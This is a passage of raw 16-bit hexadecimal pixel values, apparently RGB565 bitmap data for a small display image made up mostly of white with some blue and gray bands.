0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xf7ff, 0xa5f9, 0x6453, 0x5453, 0x5475, 0x4c54, 0x4c54, 0x5454, 0x5454, 0x5454, 0x5454, 0x5454, 0x5454, 0x5454, 0x5c33, 0x5433, 0x5434, 0x5454, 0x5454, 0x5454, 0x5454, 0x5454, 0x5434, 0x5434, 0x5c34, 0x5c34, 0x5c34, 0x5c33, 0x6433, 0x6433, 0x5473, 0x5432, 0x5453, 0x5475, 0x3b72, 0x7cf7, 0xefdf, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7fe, 0xc638, 0xad76, 0xb535, 0xcdf8, 0x9450, 0xfffe, 0xbe16, 0xe75c, 0xa555, 0xad97, 0xce9b, 0xd6dc, 0xadb8, 0xb5b8, 0xef7d, 0xffff, 0x9492, 0xce79, 0xce7a, 0xce7a, 0xa534, 0xf7df, 0xf7be, 0x94b2, 0x9cd2, 0xce79, 0xbdd6, 0x94b2, 0xd6ba, 0xef9e, 0xffff, 0xffde, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe,
0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xef1c, 0x9472, 0xd6db, 0xd73d, 0xbe17, 0xad96, 0xffff, 0xc618, 0xa4f4, 0xbd96, 0xcdf8, 0x9451, 0xa4b3, 0xde9a, 0xef1c, 0x8c10, 0xffff, 0xdefb, 0xa534, 0xffff, 0xa533, 0xbdf7, 0xce37, 0xce37, 0x9cb1, 0xded9, 0xce78, 0x8c71, 0xffbe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xefff, 0x74f6, 0x6d79, 0x975f, 0x8f5f, 0x8f7f, 0x875f, 0x8f5f, 0x8f5f, 0x973f, 0x973f, 0x973f, 0x973f, 0x973f, 0x973f, 0x973f, 0x973f, 0x973f, 0x973f, 0x9f3f, 0x9f3f, 0x9f3f, 0x9f3f, 0x973f, 0x973f, 0x973f, 0x973f, 0x973f, 0x973f, 0x973f, 0x8f5f, 0x8f7f, 0x875f, 0x971f, 0xaf1f, 0xd73f, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xbe17, 0xe73c, 0x9cd2, 0xdeb9, 0xb574, 0xad54, 0xa4f3, 0xef3d, 0xb577, 0xb556, 0xd638, 0xbd95, 0xbdb8, 0xe71d, 0xd65a, 0xffdf, 0x8c51, 0xbdd7, 0xb596, 0xbdd6, 0x8430, 0xffbe, 0xe71b, 0xce38, 0xe6fb, 0xbd96, 0xa4d3, 0xad14, 0xa575, 0xdf1c, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xdefb, 0x8c71, 0xd6ba, 0xce79, 0xce59, 0xa534, 0xffff, 0xb596, 0xbdd7, 0xc638, 0xb596, 0x9492, 0xffff, 0x8c51, 0xef5d, 0xf7be, 0xffdf, 0xbdf7, 0x94b2, 0xffff, 0xffff, 0xffdf, 0xbdd7, 0x8430, 0xbdf7, 0xc618, 0xd69a, 0xad55, 0xbdd7, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbe, 0xffdf, 0xefff, 0x7d16, 0x9df9, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7be, 0xffff, 0xffff, 0xffff, 0xe71c, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef5d, 0xb596, 0xce79, 0xc618, 0xb5b6, 0xce59, 0xffff, 0xe71c, 0xf79e, 0xad75, 0xf7be, 0xdedb, 0xb596, 0xce79, 0xffff, 0xffff, 0xce79, 0x9492, 0xef7d, 0xf7be, 0xffff, 0xffdf, 0xffff, 0xc638, 0xd69a, 0xce79, 0xc638, 0xce79, 0xdedb, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xe7ff, 0x74f5, 0x95f8, 0xefff, 0xf7ff, 0xffdf, 0xffde, 0xffdf, 0xffff, 0xffff, 0xf7fe, 0xf7fe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xf79e, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xe7ff, 0x7515, 0x95f8, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xf7ff, 0xffff, 0xf7bf, 0xef1e, 0xef3d, 0xef3d, 0xe75c, 0xe75c, 0xe75c, 0xef5c, 0xef5d, 0xef5d, 0xef3d, 0xef5d, 0xe75d, 0xe75d, 0xe75d, 0xe75d, 0xe73c, 0xe73c, 0xe71d, 0xe73e, 0xe73d, 0xe71d, 0xe73d, 0xe75d, 0xe75d, 0xe75d, 0xe75d, 0xe75d, 0xe75d, 0xe75d, 0xe75d, 0xe73d, 0xe73d, 0xe73d, 0xe75e, 0xe75e, 0xe75d, 0xe75d, 0xe75d, 0xe75d, 0xe75d, 0xe75d, 0xe73c, 0xe73c, 0xe73c, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xe7ff, 0x7d16, 0x9df9, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xf7fe, 0xf7fe, 0xdf1b, 0x8411, 0x6b2f, 0x736d, 0x736d, 0x736d, 0x6b8d, 0x6b8d, 0x738e, 0x738e, 0x738e, 0x738e, 0x6b8e, 0x6bae, 0x6bae, 0x6bae, 0x6bae, 0x634d, 0x630b, 0x630d, 0x6b2d, 0x6b0d, 0x630d, 0x630c, 0x632c, 0x630c, 0x630c, 0x630c, 0x630c, 0x630c, 0x630c, 0x62ec, 0x62ec, 0x5aec, 0x62ec, 0x5aec, 0x5aec, 0x5acb, 0x5acb, 0x5aca, 0x5acb, 0x5acb, 0x52cb, 0x5aeb, 0x52cb, 0x52aa, 0x7c30, 0xe77d, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xe7ff, 0x7d16, 0xa5d9, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xf7fe, 0xf7fe, 0xf7fe, 0x6bce, 0x6bcf, 0x8432, 0x8431, 0x7c11, 0x7c31, 0x7c31, 0x7431, 0x7431, 0x7432, 0x7c32, 0x7432, 0x7432, 0x7432, 0x6c31, 0x6c31, 0x6c31, 0x6c10, 0x63cf, 0x634e, 0x634e, 0x634e, 0x634e, 0x5b4d, 0x5b2d, 0x5b2c, 0x5b2c, 0x5b0c, 0x530c, 0x5b0c, 0x5b2d, 0x5b2d, 0x5b0d, 0x5b0d, 0x5b0d, 0x5b2d, 0x5b0d, 0x5b0c, 0x5b0c, 0x5aeb, 0x52ec, 0x52ec, 0x4aec, 0x4b0c, 0x4acc, 0x52eb, 0x3a08, 0x8c92, 0xffff, 0xf7df, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xefff, 0x7cf6, 0xa5d9, 0xf7ff, 0xffdf, 0xffff, 0xfffe, 0xffff, 0xf7fe, 0xfffe, 0xe75b, 0x636c, 0x6bef, 0x63d0, 0x53b2, 0x53b2, 0x53b2, 0x4bd3, 0x4bf3, 0x4bd3, 0x4bf4, 0x53f4, 0x5414, 0x5435, 0x5455, 0x4c54, 0x4c54, 0x5475, 0x5c95, 0x5c95, 0x5c54, 0x5c34, 0x5c54, 0x5c54, 0x5c54, 0x5c53, 0x5433, 0x5433, 0x5433, 0x5413, 0x4c13, 0x4c13, 0x4bf3, 0x4bd3, 0x43d2, 0x43d2, 0x43b2, 0x43b2, 0x43b1, 0x4bb1, 0x4bb1, 0x4391, 0x4391, 0x4392, 0x4392, 0x4b70, 0x4b0d, 0x3a08, 0x8c71, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 